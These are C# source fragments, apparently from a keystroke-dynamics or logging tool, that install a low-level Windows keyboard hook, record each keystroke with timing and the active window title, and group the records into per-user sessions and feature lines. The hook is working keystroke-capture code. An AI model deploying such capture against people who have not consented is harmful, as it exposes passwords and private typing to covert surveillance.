public void ProcessKeylog(dotnet_keylogger.keylog K) { if (this.Name != K.WindowTitle) { throw new System.Exception("Keylog application name does not match Application obj name"); } if (this.StartTime == DateTime.MinValue) { this.StartTime = K.Timestamp; } this.EndTime = K.Timestamp; this.KeylogCount++; }
private Boolean readKeylog(String ApplicationRegex = ".*", String ProcessRegex = ".*", String SessionRegex = ".*") { while (!keylogQ.isEmpty()) { bool _match; try { latest_keylog = keylogQ.Retrieve(); if (!this.Sessions.Last().AddKeylog(latest_keylog, user)) { // Session wants to be closed, time for a new one this.Sessions.Add(new Session(Sessions.Count)); this.Sessions.Last().AddKeylog(latest_keylog, user); } _match = true; if (SessionRegex != ".*") { if (!(Regex.Match(latest_keylog.Session.ToString(), SessionRegex)).Success) { _match = false; } } if (ApplicationRegex != ".*") { if (!(Regex.Match(latest_keylog.WindowName, ProcessRegex)).Success) { _match = false; } } if (ProcessRegex != ".*") { if (!(Regex.Match(latest_keylog.WindowTitle.ToString(), ProcessRegex)).Success) { _match = false; } } if (_match) { keylogs.Enqueue(latest_keylog); return(true); // We have an event, time to go } } catch { //ignore } } return(false); // Couldn't find an event, time to return false }
public bool AddKeylog(dotnet_keylogger.keylog Keylog, string User) { if (this.Closed) { throw new SystemException("Session is closed"); } if (this.Keylogs != null) { if ((Keylog.Timestamp - this.Keylogs.Last().Timestamp).TotalSeconds > this.MaxAge) { // Too old, time to close this.Close(); return(false); } if (User != this.User) { // Diff user, time to close this.Close(); return(false); } } else { this.Keylogs = new List <dotnet_keylogger.keylog>(); this.StartTime = Keylog.Timestamp; this.User = User; } this.Keylogs.Add(Keylog); this.KeylogCount++; Keylog.Session = this.Index; if (!this.ContainsApplication(Keylog.WindowTitle)) { this.Applications.Add(Keylog.WindowTitle, new Application(Keylog.WindowTitle)); this.ApplicationCount++; } this.Applications[Keylog.WindowTitle].ProcessKeylog(Keylog); return(true); }
private static IntPtr HookCallback(int nCode, IntPtr wParam, IntPtr lParam) { /* * Params: * nCode : if greater than ZERO, return the result of CallNextHookEx * wParam : WM_KEYDOWN; WM_KEYUP, WM_SYSKEYDOWN or WM_SYSKEYUP * lParam : */ /* * lParams struct: * DWORD vkCode = Virtual Key code * DWORD scanCode = Hardware scan code for the key * DWORD flags = 8 bit code describing various events * bits of note: * 0: Is it an extended key? * 1: If the key injection comes from a lower integirty process? * 4: Was the key injected? * 5: Is the ALT key down? Useless * 7: Transition (0 if pressed, 1 if released) * DWORD time = timestamp equivelant to GetMessageTime * ULONG_PTR dwExtraInfo = Pointer to extra info */ if (nCode >= 0 && control.state == true) { long diff = 0; int vkCode = Marshal.ReadInt32(lParam); int scanCode = Marshal.ReadInt32(lParam + 4); int flags = Marshal.ReadInt32(lParam + 8); /// Skip repeat messages if a key if its being held down if (scanCode == lastScanCode && flags == lastFlags) { return(CallNextHookEx(_hookID, nCode, wParam, lParam)); } else { lastScanCode = scanCode; lastFlags = flags; } int timestamp = Marshal.ReadInt32(lParam + 12); if (currentTime.Year == 1) { currentTime = DateTime.UtcNow; } else { if (timestamp < lastMsgTime) { diff = (timestamp + (2147483647 - lastMsgTime)); } //long max wrap else { diff = timestamp - lastMsgTime; } currentTime = currentTime.AddMilliseconds(diff); } lastMsgTime = timestamp; int kflags = 0x00000000; if (wParam == (IntPtr)WM_SYSKEYDOWN) { switch (vkCode) { case (int)VirtualKeyStates.VK_LALT: left_alt = 1; break; case (int)VirtualKeyStates.VK_RALT: if (right_alt == 1) { return(CallNextHookEx(_hookID, nCode, wParam, lParam)); } right_alt = 1; break; case (int)VirtualKeyStates.VK_LCON: /// Some weird bug where right alt send alternating ralt and lcon if (right_alt == 1) { return(CallNextHookEx(_hookID, nCode, wParam, lParam)); } break; } } if (wParam == (IntPtr)WM_KEYDOWN) { switch (vkCode) { case (int)VirtualKeyStates.VK_CAPITAL: caps = 1 - caps; break; case (int)VirtualKeyStates.VK_NUM: num = 1 - num; break; case (int)VirtualKeyStates.VK_SCROLL: scroll = 1 - scroll; break; case (int)VirtualKeyStates.VK_LSHIFT: left_shift = 1; break; case (int)VirtualKeyStates.VK_RSHIFT: right_shift = 1; break; case (int)VirtualKeyStates.VK_LWIN: win = 1; break; } } if (wParam == (IntPtr)WM_KEYUP) { switch (vkCode) { case (int)VirtualKeyStates.VK_LSHIFT: left_shift = 0; break; case (int)VirtualKeyStates.VK_RSHIFT: right_shift = 0; break; case (int)VirtualKeyStates.VK_LWIN: win = 0; break; case (int)VirtualKeyStates.VK_LALT: left_alt = 0; break; case (int)VirtualKeyStates.VK_RALT: right_alt = 0; break; } } kflags += scroll << 7; kflags += num << 6; kflags += caps << 5; kflags += left_alt << 4; kflags += right_alt << 3; kflags += left_shift << 2; kflags += right_shift << 1; kflags += win; keylog K = new keylog(currentTime, diff, lParam, (byte)kflags, GetActiveWindowTitle(), GetActiveWindowName()); kQ.Add(K); } return(CallNextHookEx(_hookID, nCode, wParam, lParam)); }
public void Add(keylog k) { this.keylogs.Enqueue(k); }
public Feature(double Value, dotnet_keylogger.keylog Keylog, string User) { this.Value = Value; this.Keylog = Keylog; this.User = User; }
private static String FeatureToLine(dotnet_keylogger.keylog keylog, string feature, int seqNo) { return(String.Join(dotnet_keylogger.keylog.delimeter.ToString(), new string[] { keylog.Timestamp.ToString("o"), user, seqNo.ToString(), keylog.Key, feature })); }